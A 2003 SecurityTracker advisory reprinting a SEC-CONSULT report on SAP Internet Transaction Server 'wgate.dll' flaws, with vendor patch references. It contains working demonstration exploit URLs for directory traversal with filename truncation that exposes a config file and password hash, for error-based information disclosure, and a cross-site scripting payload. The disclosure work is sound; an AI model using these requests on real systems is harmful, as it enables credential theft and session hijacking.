SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Internet Transaction Server Vendors:   SAP
SAP Internet Transaction Server Bugs in 'wgate.dll' Disclose Files to Remote Users
SecurityTracker Alert ID:  1007597
SecurityTracker URL:  http://securitytracker.com/id/1007597
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 31 2003
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)
Description:   Several vulnerabilities were reported in the SAP Internet Transaction Server (ITS). A remote user can view files on the system. A remote user can view system information. A remote user can also conduct cross-site scripting attacks.

SEC-CONSULT reported several flaws affecting the 'wgate.dll' module.

It is reported that a remote user can view arbitrary files on the system. A demonstration exploit URL is provided:

http://[target]/scripts/wgate/pbw2/!?

The exploit requires the following parameters (where "+" is used to represent the encoded space character ["%20"]):

~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++

In this particular example, the "global.srvc" configuration file will be displayed. This file contains usernames encrypted passwords. A remote user can retrieve the file and can use cracking methods to attempt to decrypt some passwords.

It is also reported that a remote user can supply specially crafted (and non-existent) values for the following parameters to cause the system to disclose system information:

~service
~templatelanguage
~language
~theme
~template

It is also reported that the software does not filter HTML code from certain parameters beforing displaying an error message containing the user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the SAP ITS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The following demonstration exploit URL and parameter is provided:

http://www.server.name/scripts/wgate.dll?

~service=--><img%09src=javascript:alert(1)%3bcrap

The vendor was reportedly notified on August 2, 2003.

Impact:   A remote user can view arbitrary files on the system with the privileges of the ITS server.

A remote user can view system information.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SAP ITS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has reportedly developed patches, as described in the following technical notes:

SAP advice 598074, 595383 and 654038

Vendor URL:  www.sap.com (Links to External Site)
Cause:   Access control error, Exception handling error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SAP Internet Transaction Server



To the List,


*******************************************************************************************
*******************************************************************************************
*******************************************************************************************


============================================================
SEC-CONSULT Security REPORT SAP Internet Transcaction Server
======================OOOOOOOOOOOO==========================

Product:        ITS ITS, Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)

Vulnerablities:

- Path/information disclosure
- Directory traversal
- Filename truncation
- Arbitrary file disclosure
- Cross site scripting/Cookie Theft

Vuln.-Classes:  Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor:         SAP (http://www.sap.com/)
Vendor-Status:  vendor contacted (02.08.2003)
Vendor-Patchs:  SAP advice 598074,595383 and 654038

Object: wgate.dll

Exploitable:
Local:          ---
Remote:         YES

============
Introduction
============

Visit "http://www.sap.com" for additional information.


=====================
Vulnerability Details
=====================


1) DIRECTORY/INFO DISCLOSURE
============================

OBJECT:
wgate.dll (win32 CGI-Communication binary)

DESCRIPTION:
Insufficient input- and output validation on miscellaneous userinput allows the insertion of non existing values for the following
 user supplied paramters:

##################
~service
~templatelanguage
~language
~theme
~template
##################

Thus leading to several unwanted error messages which may include sensitive information on operating-system, software version a
nd the directory structure of the attacked server.

EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&
---*---

REMARKS:
It might be possible that "~template" is an undocumented or forgotten variable (NOT confirmed).



2) ARBITRARY FILE DISCLOSURE (Directory Traversal / File Truncation)
====================================================================

OBJECT:
wgate.dll (win32 CGI-Communication binary)

DESCRIPTION:

EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?

with params:
~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
---*---

(where "+" stands for spaces "%20" uri encoded).

Above will respond with the global server configuration file "global.srvc" on an ITS default-installation.

Normally the default-template extension (.html ?) gets concatenated to the rest of the template information.
Most probably somebody wanted to avoid a possible Bufferoverflow by truncating the input values if they exceed a given length.
Thus making it possible to shed the ".html" extension.

For some strange reason now and then the program responds with an error-message instead of giving out the requested file. This
might be due to unwanted?/additional? HTTP-Request-Header infos (NOT confirmed).

REMARKS:

The global configuration file "global.srvc" contains username and des-encrypted password
---*---
~password       des26(2c94f116f4393f3d)
~login          Master
---*---

A good DES-cracker should be able to crack this password-hash either by using wordlistst or by brute-force methods (NOT confirm
ed).


3) CROSS SITE SCRIPTING / COOKIE THEFT
======================================

OBJECT:
wgate.dll (win32 CGI-Communication binary)

DESCRIPTION:
Insufficient input- and output validation on miscellaneous userinput-parameters enables insertion of html/client side scripting
 tags.

EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate.dll?

with params:
~service=--><img%09src=javascript:alert(1)%3bcrap
---*---

REMARKS:
Due to excessive usage of cookies for managing sessions and/or states cookie-theft is very likely.
There might be several other location where html/scripting tags can be inserted (NOT confirmed).


===============
GENERAL REMARKS
===============

Above findings derive from an external(black box) security test.
we would like to apologize in advance for potential nonconformities and/or known issues.


====================
Recommended Hotfixes
====================

Vendor-Patches: SAP advice 598074,595383 and 654038


EOF Martin Eiszner / @2003m.eiszner@sec-consult.com


=======
Contact
=======

SEC-CONSULT
Austria / EUROPE

0043 699 12177237
m.eiszner@sec-consult.com
http://www.sec-consult.com


*******************************************************************************************
*******************************************************************************************
*******************************************************************************************


-- 
Martin Eiszner / SEC-CONSULT
Austria / EUROPE

m.eiszner@sec-consult.com
http://www.sec-consult.com
http://www.websec.org
tel: 0043 699 121772 37

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC